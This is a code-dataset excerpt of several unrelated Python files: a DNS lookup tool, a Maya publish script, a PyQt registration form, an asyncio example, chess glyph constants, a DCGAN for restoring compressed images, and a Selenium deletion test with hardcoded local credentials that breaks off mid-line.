IP address.\n \"\"\"\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.connect((ip, port))\n yield sock\n sock.close()\n except socket.error:\n log_error(Errors.SOCKET_ERROR, ip)\n\n\ndef convert_binary(number, length=8):\n return [int(x) for x in '{0:0{1}b}'.format(number, length)]\n\n\ndef is_ip(string):\n parts = string.split(\".\")\n if len(parts) != 4:\n return False\n for part in parts:\n try:\n if int(part) >= 256:\n return False\n except ValueError:\n return False\n return True\n\n\ndef main():\n \"\"\"Main programmy thing, y'all know what it do\"\"\"\n parser = argparse.ArgumentParser(description=\"DNS Lookup Tool\")\n\n parser.add_argument(\"hostname\", type=str, action=\"store\",\n help=\"the hostname to lookup\")\n parser.add_argument(\"-d\", \"--dns-server\", dest=\"dns\", default=DNS_SERVER,\n help=\"the dns server to use to lookup the hostname\")\n parser.add_argument(\"-r\", \"--reverse\", dest=\"reverse\", action=\"store_true\",\n help=\"perform a reverse lookup\")\n\n args = parser.parse_args()\n\n packet = DNSReader(args.hostname, dns=args.dns, reverse=args.reverse)\n\n if args.reverse:\n packet.add_query(DomainType.PTR)\n else:\n packet.add_query(DomainType.A)\n packet.add_query(DomainType.AAAA)\n packet.add_query(DomainType.MX)\n packet.add_query(DomainType.CNAME)\n packet.add_query(DomainType.TXT)\n\n answers = packet.answers\n\n for type, answers in answers.items():\n print(type)\n for answer in answers:\n print(answer)\n print()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"example/python/dns/dns.py","file_name":"dns.py","file_ext":"py","file_size_in_byte":8171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"132949061","text":"# -*- coding: utf-8 -*-\nimport os\nimport optparse\nimport logging\nimport time\nimport maya.cmds as mc\nfrom miraLibs.pipeLibs import pipeFile\nfrom miraLibs.pipeLibs.backup import backup\nfrom miraLibs.pipeLibs.pipeDb import sql_api\nfrom miraLibs.pipeLibs.pipeMaya.network import delete_network\nfrom miraLibs.mayaLibs import open_file, quit_maya, save_as, remove_reference_by_group, load_plugin, new_file\nfrom miraLibs.pyLibs import create_parent_dir, copy\n\n\ndef main():\n logger = logging.getLogger(\"scenedetail publish\")\n new_file.new_file()\n load_plugin.load_plugin(\"mtoa.mll\")\n load_plugin.load_plugin(\"AbcImport.mll\")\n file_path = options.file\n open_file.open_file(file_path)\n # get paths\n obj = pipeFile.PathDetails.parse_path(file_path)\n project = obj.project\n seq = obj.seq\n shot = obj.shot\n publish_path = obj.publish_path\n # export gpu cache\n '''\n gpu_cache_path = pipeFile.get_shot_step_gpucache_file(seq, shot, \"sceneset\", project)\n create_parent_dir.create_parent_dir(gpu_cache_path)\n gpu_directory = os.path.dirname(gpu_cache_path)\n gpu_file_name = os.path.splitext(os.path.basename(gpu_cache_path))[0]\n logger.info(\"Exporting gpu cache...\")\n export_gpu_cache.export_gpu_cache(\"sceneset\", gpu_directory, gpu_file_name, 1, 1)\n logger.info(\"Export gpu cache to %s\" % gpu_cache_path)\n backup.backup(project, gpu_cache_path, False)\n '''\n # replace workarea v000\n workarea_file_path = file_path.replace(\"_QCPublish\", \"_workarea\")\n # backup.backup(project, workarea_file_path, False)\n copy.copy(file_path, workarea_file_path)\n logger.info(\"Cover %s\" % workarea_file_path)\n # add to database\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n task_id = int(mc.getAttr(\"ROOT.task_id\"))\n db = sql_api.SqlApi(project)\n arg_dict = {'taskId': task_id, 'taskEndDate': current_time}\n db.releaseTask(arg_dict)\n logger.info(\"Add to data base.\")\n # save to publish path\n delete_network.delete_network()\n # remove camera reference\n remove_reference_by_group.remove_reference_by_group(\"camera\")\n remove_reference_by_group.remove_reference_by_group(\"_TEMP\")\n logger.info(\"remove camera and remove _TEMP\")\n # save to publish path\n create_parent_dir.create_parent_dir(publish_path)\n save_as.save_as(publish_path)\n logger.info(\"Save to %s\" % publish_path)\n backup.backup(project, publish_path, False)\n # quit maya\n quit_maya.quit_maya()\n\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n parser.add_option(\"-f\", dest=\"file\", help=\"maya file ma or mb.\", metavar=\"string\")\n parser.add_option(\"-c\", dest=\"command\",\n help=\"Not a needed argument, just for mayabatch.exe, \" \\\n \"if missing this setting, optparse would \" \\\n \"encounter an error: \\\"no such option: -c\\\"\",\n metavar=\"string\")\n options, args = parser.parse_args()\n if len([i for i in [\"file_name\"] if i in dir()]) == 1:\n options.file = file_name\n main()\n","sub_path":"miraScripts/pipeTools/publish/scenedetail_publish.py","file_name":"scenedetail_publish.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"210150756","text":"from login import *\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Register(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(958, 760)\n MainWindow.setStyleSheet(\"background: white;\")\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(30, 200, 301, 61))\n self.label.setObjectName(\"label\")\n self.gender = QtWidgets.QComboBox(self.centralwidget)\n self.gender.setGeometry(QtCore.QRect(140, 470, 241, 41))\n self.gender.setObjectName(\"gender\")\n self.gender.addItem(\"\")\n self.gender.addItem(\"\")\n self.time = QtWidgets.QComboBox(self.centralwidget)\n self.time.setGeometry(QtCore.QRect(140, 550, 241, 41))\n self.time.setObjectName(\"time\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.frame = QtWidgets.QFrame(self.centralwidget)\n self.frame.setGeometry(QtCore.QRect(720, 230, 211, 211))\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.label_8 = QtWidgets.QLabel(self.frame)\n self.label_8.setGeometry(QtCore.QRect(50, 80, 101, 31))\n self.label_8.setObjectName(\"label_8\")\n self.frame_2 = QtWidgets.QFrame(self.centralwidget)\n self.frame_2.setGeometry(QtCore.QRect(-130, 10, 1091, 171))\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_2.setObjectName(\"frame_2\")\n self.label_2 = QtWidgets.QLabel(self.frame_2)\n self.label_2.setGeometry(QtCore.QRect(700, 20, 371, 31))\n self.label_2.setObjectName(\"label_2\")\n self.label_3 = QtWidgets.QLabel(self.frame_2)\n self.label_3.setGeometry(QtCore.QRect(720, 50, 351, 21))\n self.label_3.setObjectName(\"label_3\")\n self.label_4 = QtWidgets.QLabel(self.frame_2)\n self.label_4.setGeometry(QtCore.QRect(730, 70, 341, 20))\n self.label_4.setObjectName(\"label_4\")\n self.label_5 = QtWidgets.QLabel(self.frame_2)\n self.label_5.setGeometry(QtCore.QRect(760, 90, 311, 20))\n self.label_5.setObjectName(\"label_5\")\n self.label_6 = QtWidgets.QLabel(self.frame_2)\n self.label_6.setGeometry(QtCore.QRect(760, 110, 311, 20))\n self.label_6.setObjectName(\"label_6\")\n self.label_15 = QtWidgets.QLabel(self.frame_2)\n self.label_15.setGeometry(QtCore.QRect(140, 10, 351, 151))\n self.label_15.setText(\"\")\n self.label_15.setPixmap(QtGui.QPixmap(\"Screenshot from 2020-01-28 13-55-45.png\"))\n self.label_15.setScaledContents(False)\n self.label_15.setObjectName(\"label_15\")\n self.label_7 = QtWidgets.QLabel(self.centralwidget)\n self.label_7.setGeometry(QtCore.QRect(430, 210, 61, 61))\n self.label_7.setObjectName(\"label_7\")\n self.label_9 = QtWidgets.QLabel(self.centralwidget)\n self.label_9.setGeometry(QtCore.QRect(10, 310, 111, 51))\n self.label_9.setObjectName(\"label_9\")\n self.name = QtWidgets.QLineEdit(self.centralwidget)\n self.name.setGeometry(QtCore.QRect(140, 310, 411, 51))\n self.name.setStyleSheet(\"font: bold;\\n\"\n\"font-size: 20px;\\n\"\n\"\")\n self.name.setText(\"\")\n self.name.setObjectName(\"name\")\n self.label_10 = QtWidgets.QLabel(self.centralwidget)\n self.label_10.setGeometry(QtCore.QRect(10, 390, 111, 51))\n self.label_10.setObjectName(\"label_10\")\n self.address = QtWidgets.QLineEdit(self.centralwidget)\n self.address.setGeometry(QtCore.QRect(140, 390, 411, 51))\n self.address.setStyleSheet(\"\\n\"\n\"font: bold;\\n\"\n\"font-size: 20px;\\n\"\n\"\")\n self.address.setObjectName(\"address\")\n self.label_11 = QtWidgets.QLabel(self.centralwidget)\n self.label_11.setGeometry(QtCore.QRect(10, 470, 121, 41))\n self.label_11.setObjectName(\"label_11\")\n self.label_12 = QtWidgets.QLabel(self.centralwidget)\n self.label_12.setGeometry(QtCore.QRect(10, 550, 81, 41))\n self.label_12.setObjectName(\"label_12\")\n self.label_13 = QtWidgets.QLabel(self.centralwidget)\n self.label_13.setGeometry(QtCore.QRect(440, 550, 131, 41))\n self.label_13.setObjectName(\"label_13\")\n self.label_14 = QtWidgets.QLabel(self.centralwidget)\n self.label_14.setGeometry(QtCore.QRect(430, 470, 211, 41))\n self.label_14.setObjectName(\"label_14\")\n self.status = QtWidgets.QComboBox(self.centralwidget)\n self.status.setGeometry(QtCore.QRect(640, 470, 241, 41))\n self.status.setStyleSheet(\"\")\n self.status.setObjectName(\"status\")\n self.status.addItem(\"\")\n self.status.addItem(\"\")\n self.duration = QtWidgets.QComboBox(self.centralwidget)\n self.duration.setGeometry(QtCore.QRect(640, 550, 241, 41))\n self.duration.setObjectName(\"duration\")\n self.duration.addItem(\"\")\n self.duration.addItem(\"\")\n self.duration.addItem(\"\")\n self.duration.addItem(\"\")\n self.save = QtWidgets.QPushButton(self.centralwidget)\n self.save.setGeometry(QtCore.QRect(310, 660, 291, 51))\n self.save.setStyleSheet(\"font: bold;\\n\"\n\"font-size: 20px;\\n\"\n\"color: black;\\n\"\n\"background-color: white;\")\n self.save.setObjectName(\"save\")\n \n ####\n \n self.save.clicked.connect(self.popup)\n ####\n self.exit = QtWidgets.QPushButton(self.centralwidget)\n self.exit.setGeometry(QtCore.QRect(810, 670, 141, 41))\n self.exit.setStyleSheet(\"font: bold;\\n\"\n\"font-size: 20px;\\n\"\n\"color: black;\")\n icon = QtGui.QIcon.fromTheme(\"exit\")\n self.exit.setIcon(icon)\n self.exit.setObjectName(\"exit\")\n \n ###\n self.exit.clicked.connect(self.exits)\n ###\n self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit.setGeometry(QtCore.QRect(510, 220, 201, 41))\n self.lineEdit.setObjectName(\"lineEdit\")\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(30, 240, 281, 16))\n self.line.setFrameShape(QtWidgets.QFrame.HLine)\n self.line.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line.setObjectName(\"line\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 958, 22))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.actionADMIN = QtWidgets.QAction(MainWindow)\n self.actionADMIN.setObjectName(\"actionADMIN\")\n self.actionREGISTERED_STUDENTS = QtWidgets.QAction(MainWindow)\n self.actionREGISTERED_STUDENTS.setObjectName(\"actionREGISTERED_STUDENTS\")\n self.actionSTATISTICS = QtWidgets.QAction(MainWindow)\n self.actionSTATISTICS.setObjectName(\"actionSTATISTICS\")\n self.actionLOGOUT = QtWidgets.QAction(MainWindow)\n self.actionLOGOUT.setObjectName(\"actionLOGOUT\")\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n###############################################################################################################################\n\n def enterData(self):\n name = self.name.text()\n address = self.address.text()\n gender = self.gender.currentText()\n time = self.time.currentText()\n status = self.status.currentText()\n duration = self.duration.currentText()\n date = self.lineEdit.text()\n\n conn = sqlite3.connect(\"midway.db\")\n cur = conn.cursor()\n\n cur.execute(\"INSERT INTO registration VALUES(?,?,?,?,?,?,?)\",(name,address,gender,status,duration,time,date))\n\n conn.commit()\n\n conn.close()\n\n##############################################################################################################################\n def popup(self):\n self.enterData()\n msg = QMessageBox()\n msg.setWindowTitle(\"Alert\")\n msg.setText(\"New Student Registered Successfully!\")\n msg.setIcon(QMessageBox.Information)\n \n x = msg.exec_()\n \n def exits(self):\n exit()\n \n \n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MIDWAY DRIVING SCHOOL 2020\"))\n self.label.setText(_translate(\"MainWindow\", \"

REGISTRATION FORM

\"))\n self.gender.setItemText(0, _translate(\"MainWindow\", \"MALE\"))\n self.gender.setItemText(1, _translate(\"MainWindow\", \"FEMALE\"))\n self.time.setItemText(0, _translate(\"MainWindow\", \"9AM\"))\n self.time.setItemText(1, _translate(\"MainWindow\", \"10AM\"))\n self.time.setItemText(2, _translate(\"MainWindow\", \"11AM\"))\n self.time.setItemText(3, _translate(\"MainWindow\", \"12PM\"))\n self.time.setItemText(4, _translate(\"MainWindow\", \"1PM\"))\n self.time.setItemText(5, _translate(\"MainWindow\", \"2PM\"))\n self.time.setItemText(6, _translate(\"MainWindow\", \"3PM\"))\n self.time.setItemText(7, _translate(\"MainWindow\", \"4PM\"))\n self.time.setItemText(8, _translate(\"MainWindow\", \"5PM\"))\n self.time.setItemText(9, _translate(\"MainWindow\", \"6PM\"))\n self.label_8.setText(_translate(\"MainWindow\", \"

PHOTO

\"))\n self.label_2.setText(_translate(\"MainWindow\", \"

MIDWAY DRIVING SCHOOL

\"))\n self.label_3.setText(_translate(\"MainWindow\", \"

Address: Manjai, The Gambia

\"))\n self.label_4.setText(_translate(\"MainWindow\", \"

Tel: (+220 ) 3918800 / 793 3540

\"))\n self.label_5.setText(_translate(\"MainWindow\", \"

Facebook: midwaydrivingschool gambia

\"))\n self.label_6.setText(_translate(\"MainWindow\", \"

E-mail: midwaydrivingschool3@gmail.com

\"))\n self.label_7.setText(_translate(\"MainWindow\", \"

Date

\"))\n self.label_9.setText(_translate(\"MainWindow\", \"

Name

\"))\n self.label_10.setText(_translate(\"MainWindow\", \"

Address

\"))\n self.label_11.setText(_translate(\"MainWindow\", \"

Gender

\"))\n self.label_12.setText(_translate(\"MainWindow\", \"

Time

\"))\n self.label_13.setText(_translate(\"MainWindow\", \"

Duration

\"))\n self.label_14.setText(_translate(\"MainWindow\", \"

Marital Status

\"))\n self.status.setItemText(0, _translate(\"MainWindow\", \"SINGLE\"))\n self.status.setItemText(1, _translate(\"MainWindow\", \"MARRIED\"))\n self.duration.setItemText(0, _translate(\"MainWindow\", \"ONE WEEKS\"))\n self.duration.setItemText(1, _translate(\"MainWindow\", \"TWO WEEKS\"))\n self.duration.setItemText(2, _translate(\"MainWindow\", \"THREE WEEKS\"))\n self.duration.setItemText(3, _translate(\"MainWindow\", \"ONE MONTH\"))\n self.save.setText(_translate(\"MainWindow\", \"REGISTER NEW STUDENT\"))\n self.exit.setText(_translate(\"MainWindow\", \"QUIT\"))\n self.lineEdit.setPlaceholderText(_translate(\"MainWindow\", \"10/feb/2020\"))\n self.actionADMIN.setText(_translate(\"MainWindow\", \"ADMIN\"))\n self.actionREGISTERED_STUDENTS.setText(_translate(\"MainWindow\", \"REGISTERED STUDENTS\"))\n self.actionSTATISTICS.setText(_translate(\"MainWindow\", \"STATISTICS\"))\n self.actionLOGOUT.setText(_translate(\"MainWindow\", \"LOGOUT\"))\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Register()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n","sub_path":"register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":13508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"379680478","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport asyncio\n\n\n@asyncio.coroutine\ndef phase(i):\n print(\"in phase {}\".format(i))\n yield from asyncio.sleep(0.5 - (0.1 * i))\n print(\"done with phase {}\".format(i))\n return \"phase {} result\".format(i)\n\n\n@asyncio.coroutine\ndef entry(num_phases):\n print(\"starting entry\")\n phases = [\n phase(i)\n for i in range(num_phases)\n ]\n print(\"waiting for phases to complete\")\n results = []\n for next_to_complete in asyncio.as_completed(phases):\n answer = yield from next_to_complete\n print(\"received answer {!r}\".format(answer))\n results.append(answer)\n print(\"results: {!r}\".format(results))\n return results\n\n\ndef main():\n event_loop = asyncio.get_event_loop()\n try:\n event_loop.run_until_complete(entry(3))\n finally:\n event_loop.close()\n\n\nif __name__ == '__main__':\n main()","sub_path":"standard/050.asyncio/control_structures/asyncio_as_completed.py","file_name":"asyncio_as_completed.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"349890850","text":"# Just for centralizing 'graphics'\n\nWHITE_PAWN = '♙'\nWHITE_KNIGHT = '♘'\nWHITE_BISHOP = '♗'\nWHITE_ROOK = '♖'\nWHITE_QUEEN = '♕'\nWHITE_KING = '♔'\n\nBLACK_PAWN = '♟'\nBLACK_KNIGHT = '♞'\nBLACK_BISHOP = '♝'\nBLACK_ROOK = '♜'\nBLACK_QUEEN = '♛'\nBLACK_KING = '♚'\n\nEMPTY_TILE = '⭘'\nSPACE = ' '\n\n'''\n♜\t♞\t♝\t♛\t♚\t♝\t♞\t♜\n♟\t♟\t♟\t♟\t♟\t♟\t♟\t♟\n\n♙\t♙\t♙\t♙\t♙\t♙\t♙\t♙\n♖\t♘\t♗\t♕\t♔\t♗\t♘\t♖\n'''","sub_path":"minichess/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"136910530","text":"from __future__ import print_function, division\n\nfrom keras.datasets import mnist\nfrom keras.layers import Input, Dense, Reshape, Flatten, Dropout\nfrom keras.layers import BatchNormalization, Activation, ZeroPadding2D\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers.convolutional import UpSampling2D, Conv2D\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import Adam\n\nimport matplotlib.pyplot as plt\n\nimport sys\n\nimport numpy as np\nfrom datasets import * \nclass DCGAN():\n def __init__(self):\n # Input shape\n self.img_rows = 64\n self.img_cols = 64\n self.channels = 1\n self.img_shape = (self.img_rows, self.img_cols, self.channels)\n self.latent_dim = 128\n\n optimizer = Adam(0.0002, 0.5)\n\n # Build and compile the discriminator\n self.discriminator = self.build_discriminator()\n self.discriminator.compile(loss='binary_crossentropy',\n optimizer=optimizer,\n metrics=['accuracy'])\n\n # Build the generator\n self.generator = self.build_generator()\n\n # The generator takes noise as input and generates imgs\n decomp_img = Input(shape=self.img_shape)\n recov_img = self.generator(decomp_img)\n\n # For the combined model we will only train the generator\n self.discriminator.trainable = False\n\n # The discriminator takes generated images as input and determines validity\n valid = self.discriminator(recov_img)\n\n # The combined model (stacked generator and discriminator)\n # Trains the generator to fool the discriminator\n self.combined = Model(decomp_img, valid)\n self.combined.compile(loss='binary_crossentropy', optimizer=optimizer)\n\n def build_generator(self):\n\n model = Sequential()\n \n model.add(Conv2D(32, kernel_size=3, strides=2, input_shape=self.img_shape, padding=\"same\"))\n #model.add(ZeroPadding2D(padding=((0,1),(0,1))))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Conv2D(64, kernel_size=3, strides=2, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Conv2D(128, kernel_size=3, strides=2, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Conv2D(256, kernel_size=3, strides=2, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n #model.add(Flatten())\n\n\n #model.add(Dense(128 * 2 * 2, activation=\"relu\", input_dim=self.latent_dim))\n #model.add(Reshape((2, 2, 128)))\n\n model.add(UpSampling2D())\n model.add(Conv2D(256, kernel_size=3, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Activation(\"relu\"))\n\n model.add(UpSampling2D())\n model.add(Conv2D(128, kernel_size=3, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Activation(\"relu\"))\n\n model.add(UpSampling2D())\n model.add(Conv2D(64, kernel_size=3, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Activation(\"relu\"))\n\n model.add(UpSampling2D())\n model.add(Conv2D(32, kernel_size=3, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Activation(\"relu\"))\n\n model.add(Conv2D(self.channels, kernel_size=3, padding=\"same\"))\n model.add(Activation(\"tanh\"))\n\n model.summary()\n\n decomp_img = Input(shape=self.img_shape)\n recov_img = model(decomp_img)\n\n return Model(decomp_img, recov_img)\n\n def build_discriminator(self):\n\n model = Sequential()\n\n model.add(Conv2D(32, kernel_size=3, strides=2, input_shape=self.img_shape, padding=\"same\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Conv2D(64, kernel_size=3, strides=2, padding=\"same\"))\n #model.add(ZeroPadding2D(padding=((0,1),(0,1))))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Conv2D(128, kernel_size=3, strides=2, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Conv2D(256, kernel_size=3, strides=1, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(1, activation='sigmoid'))\n\n model.summary()\n\n img = Input(shape=self.img_shape)\n validity = model(img)\n\n return Model(img, validity)\n\n def train(self, epochs, batch_size=128, save_interval=50):\n\n orig_train=load_CLDHGH_orig(path=\"/home/jliu447/lossycompression/multisnapshot-data-cleaned/CLDHGH/\",size=64,endnum=50)\n decomp_train=load_CLDHGH_decomp(path=\"/home/jliu447/lossycompression/multisnapshot-data-cleaned/CLDHGH_SZ/\",size=64,endnum=50)\n \n # Adversarial ground truths\n valid = np.ones((batch_size, 1))\n fake = np.zeros((batch_size, 1))\n\n for epoch in range(epochs):\n\n \n # ---------------------\n # Train Discriminator\n # ---------------------\n\n # Select a random batch of images\n idx = np.random.randint(0, orig_train.shape[0], batch_size)\n orig_imgs = orig_train[idx]\n orig_imgs = np.expand_dims(orig_imgs, axis=3)\n decomp_imgs=decomp_train[idx]\n decomp_imgs = np.expand_dims(decomp_imgs, axis=3)\n # Sample noise as generator input\n #noise = np.random.normal(0, 1, (batch_size, self.latent_dim))\n\n # Generate a batch of new images\n recov_imgs = self.generator.predict(decomp_imgs)\n\n # Train the critic\n d_loss_real = self.discriminator.train_on_batch(orig_imgs, valid)\n d_loss_fake = self.discriminator.train_on_batch(recov_imgs, fake)\n d_loss = 0.5 * np.add(d_loss_fake, d_loss_real)\n\n # Clip critic weights\n '''\n for l in self.discriminator.layers:\n weights = l.get_weights()\n weights = [np.clip(w, -self.clip_value, self.clip_value) for w in weights]\n l.set_weights(weights)\n '''\n\n # ---------------------\n # Train Generator\n # ---------------------\n\n g_loss = self.combined.train_on_batch(decomp_imgs, valid)\n\n # Plot the progress\n print (\"%d [D loss: %f, acc.: %.2f%%] [G loss: %f]\" % (epoch, d_loss[0], 100*d_loss[1], g_loss))\n # If at save interval => save generated image samples\n if epoch % save_interval == 0:\n self.generator.save(\"generator.h5\")\n\n \n\n\n\n\nif __name__ == '__main__':\n dcgan = DCGAN()\n dcgan.train(epochs=200000, batch_size=32, save_interval=1000)\n","sub_path":"dcgan/dcgan.py","file_name":"dcgan.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"373494127","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/2/7 11:52\n# @Author : QiWei.Ren\nimport unittest,time,re\nfrom selenium import webdriver\nfrom CINTEL_FZWEB3_1_2_1.common.mysql import *\nfrom CINTEL_FZWEB3_1_2_1.common.getfile_data_time_levelup import *\nfrom CINTEL_FZWEB3_1_2_1.logger.log import *\n\"\"\"\n不选直接删除\n选择单挑删除\n多选删除\n\"\"\"\nlog=Log()\nclass Set_code(unittest.TestCase):\n def setUp(self):\n log.info(\"打开浏览器\")\n url = \"http://192.168.2.87:8080/rg_web/index.shtml\"\n self.driver = webdriver.Chrome()\n self.driver.implicitly_wait(30)\n self.driver.maximize_window()\n self.driver.get(url)\n\n def tearDown(self):\n log.info(\"关闭浏览器\")\n self.driver.quit()\n\n def del_t(self):\n driver=self.driver\n self.driver.find_element_by_id(\"login_name\").send_keys(\"itim\")\n self.driver.find_element_by_id(\"password\").send_keys(\"itim204\")\n self.driver.find_element_by_xpath(\"//*[@id='vcode']\").send_keys(\"8888\")\n self.driver.find_element_by_xpath(\"//div[@onclick='loginSubmit()']\").click()\n self.driver.implicitly_wait(30)\n log.info(\"%s用户,登录成功\" % self.driver.find_element_by_class_name(\"protel\").text[1:10])\n click_btn = self.driver.find_elements_by_class_name(\"desktop-app\")[47]\n from selenium.webdriver.common.action_chains import ActionChains\n action=ActionChains(driver)\n write=self.driver.find_element_by_xpath(\"/html/body/div[1]/div[3]/div[1]/div[6]/fieldset/legend\")\n action.move_to_element(write).perform()\n click_btn.click()\n self.driver.implicitly_wait(30)\n log.info(self.driver.find_element_by_class_name(\"layui-layer-title\").text)\n self.driver.switch_to_frame(self.driver.find_element_by_tag_name(\"iframe\"))\n\n def test_del_empty(self):\n log.info(\"待选删除开始执行\")\n self.del_t()\n driver=self.driver\n\n driver.find_element_by_xpath(\"/html/body/div[1]/div[1]/div[1]/div/button[3]/i\").click()\n time.sleep(1)\n fact_name = driver.find_element_by_class_name(\"layui-layer-content\").text\n log.debug(fact_name)\n expect_name=\"请选择要删除的行\"\n self.assertEqual(fact_name,expect_name)\n\n\n def test_del_onedel(self):\n log.info(\"单条删除开始执行\")\n self.del_t()\n driver = self.driver\n\n driver.find_element_by_xpath(\n \"/html/body/div[1]/div[2]/div/div/div/div/div[3]/div[2]/table/tbody/tr[1]/td[1]/div/div/i\").click()\n text=driver.find_element_by_xpath(\"/html/body/div[1]/div[2]/div/div/div/div\").text.split(\"修改时间\")[1]\n\n driver.find_element_by_xpath(\"/html/body/div[1]/div[1]/div[1]/div/button[3]/i\").click()\n time.sleep(1)\n self.driver.find_element_by_class_name(\"layui-layer-btn0\").click()\n time.sleep(0.5)\n fact_name = driver.find_element_by_class_name(\"layui-layer-content\").text\n log.debug(fact_name)\n expect_name = \"删除成功\"\n num = re.findall(r\"\\d+\\.?\\d*\", text)[00]\n Mysql.dbconfig = {\n 'host': '192.168.2.87',\n 'port': 3306,\n 'db': 'rg_web3_1',\n 'user': 'root',\n 'passwd': '123456',\n 'charset': 'utf8'\n }\n db = Mysql(Mysql.dbconfig)\n fact = db.select(table=\"t_setcode\", colume='set_code', condition='set_code=\"%s\"' %num)\n if fact:\n print(\"setcode:'%s'\".format(fact),\"删除失败\")\n else:\n print(\"setcode:'%s'\".format(fact),\"删除成功\")\n db.close()\n self.assertEqual(fact_name, expect_name)\n\n def test_del_moredel(self):\n self.del_t()\n driver = self.driver\n log.warning(\"复选框:%s\"%driver.find_element_by_xpath( \"/html/body/div/div[2]/div/div/div/div/div[3]/div[2]/table/tbody/tr[1]/td/div/div/i\"))\n for i in range(6):\n if i > 0:\n driver.find_element_by_xpath(\n \"/html/body/div/div[2]/div/div/div/div/div[3]/div[2]/table/tbody/tr[%s]/td/div/div/i\" % i).click()\n text = driver.find_element_by_xpath(\"/html/body/div[1]/div[2]/div/div/div/div\").text\n text3=re.findall(r\"\\d+\\.?\\d*\", text)\n text4=[]\n for i in text3:\n if list(i).__len__()>=5:\n text4.append(i)\n driver.find_element_by_xpath(\"/html/body/div[1]/div[1]/div[1]/div/button[3]/i\").click()\n time.sleep(1)\n self.driver.find_element_by_class_name(\"layui-layer-btn0\").click()\n time.sleep(0.5)\n fact_name = driver.find_element_by_class_name(\"layui-layer-content\").text\n print(fact_name)\n expect_name = \"删除成功\"\n self.assertEqual(fact_name, expect_name)\n\n Mysql.dbconfig = {\n 'host': '192.168.2.87',\n 'port': 3306,\n 'db': 'rg_web3_1',\n 'user': 'root',\n 'passwd': '123456',\n 'charset': 'utf8'\n }\n db = Mysql(Mysql.dbconfig)\n fact = db.select(table=\"t_setcode\", colume='set_code',\n condition='set_code=\"%s\" or set_code=\"%s\" or set_code=\"%s\" or set_code=\"%s\" or 